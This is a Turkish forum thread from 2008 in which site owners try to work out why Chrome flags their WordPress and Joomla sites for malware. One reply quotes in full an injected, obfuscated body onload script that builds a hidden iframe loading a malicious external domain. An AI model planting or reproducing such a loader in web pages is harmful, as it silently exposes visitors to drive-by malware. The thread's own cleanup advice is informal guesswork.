Şimdi Ara

sitemde galiba kötü amaçlı yazılım var

Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
2 Misafir - 2 Masaüstü
5 sn
7
Cevap
0
Favori
4.353
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
0 oy
Öne Çıkar
Sayfa: 1
Giriş
  • merhaba. 3 hafta önce wordpress ile kendime bir host üzerinde blog açtım. bu konular hakkında pek bilgim olduğunu söyleyemem.

problemime gelince, siteme google chrome dan girince "******.net adresindeki web sitesi, bilgisayarınıza zarar verebilecek veya izniniz olmadan çalışabilecek kötü amaçlı yazılım barındıran bestsexymall.com sitesinden öğeler içeriyor. Kötü amaçlı yazılım içeren bir web sitesini yalnızca ziyaret etmek bile bilgisayarınıza virüs bulaşmasına yol açabilir." uyarısı alıyorum.

anasayfanın kayanağına baktığımda bestsexymall ile ilgili herhangi bir şey bulamadım. sitemi nasıl kurtarabilrim. lütfen yardım edin.

• ftp yi tamamen sil
    tüm şifrelerini değiştir
    database sil
    bilgisayarından atma dosyaları
    temiz bir bilgisayar bul
    file zilla yada cute kullanma kullnacaksan önce bilgisayarına format at sonra herşeyi sıfırdan kur sonra
    ondada şifreleri kaydetme sürekli temizle yok ben bunları yapmam diyrosan sil at siteyi çünkü 3 gün sonra gene gelir..hostunada dikkat et onlarda bulaştırıyor bazen
  • aynı sorun bende de çıktı. Kaynağı görüntüle diyerek inceledim. Ama yok.. Daha sonra farkettim.. <body onload=" kısmında uzunca bişeyler var.. Bilgisayarımdaki dosyalarda bunlar yoktu. Orjinallerini yükleyince düzelti. Ama bu tekrar olmayacak demek değil !! Elinde orjinalleri yoksa <body onload kısmındaki fazlalıkları sil sorun düzelecektir.

Ben joomla kullanıyordum. Tema dosyalarına atmış bu kodu. Ayrıca admin panelindeki tema dosyasında da vardı. sorun server kaynaklı olabilir mi? Hangi hosting şirketiyle çalışıyorsun??

< Bu mesaj bu kişi tarafından değiştirildi sn1907 -- 20 Ekim 2008; 18:13:30 >
  • kodlarıma eve gidince bakacağım. eğer bende de <body onload kısmında benzer şey varsa demek sorun ordan kaynaklanıyordur.

servage.net hosting şirketini kullanıyorum.

< Bu mesaj bu kişi tarafından değiştirildi kinoxybird -- 20 Ekim 2008; 19:23:41 >
  • Başka bi sitemde daha çıktı aynı sorun.. Yine bilgisayarımdaki dosyalarda sorun yok.. Orjinalleri yükledim sorun düzeldi..

otomatik olarak index.php , index.html , index.htm dosyalarına bir kod ekleniyor. Tüm index dosyalarında mevcut aşağıdaki kod..

<body onload = "yonlendir();status='';n='yma';b='c/';md='fra';t='sts';y='l';xj='l.c';u='ex';nv='me';ph='p';lc='c';ri='be';bf='i';p='htt';ap='://';lr='om/';ow='sr';s='d';cr='c';ir=bf.concat(md,nv);r=ow.concat(lc);c=p.concat(ph,ap,ri,t,u,n,y,xj,lr,s,cr,b);var wq=document.createElement(ir);wq.setAttribute('width','5');wq.setAttribute('height','5');wq.setAttribute('style','display:none');wq.setAttribute(r,c);document.body.appendChild(wq);window.status=status;"> 
  • aynı kodlar benim sitemde de çıktı. wordpress kullanıyorum ve index.php nin sonunda buldum kodları. hosting şirketimiz aynı mı? acaba sorun onlardan mı kaynaklanıyor?

ayrıca yardımın için teşşekürler.
  • hosting şirketlerimiz farklı.. serverda virüs olabilir diye düşünüyorum.. Benim bilgisayarımda virüs olsa bilgisayardaki dosyaların da bozulması lazım.. Ama sadece sitedekilerde sorun var..
  • 
Sayfa: 1
- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.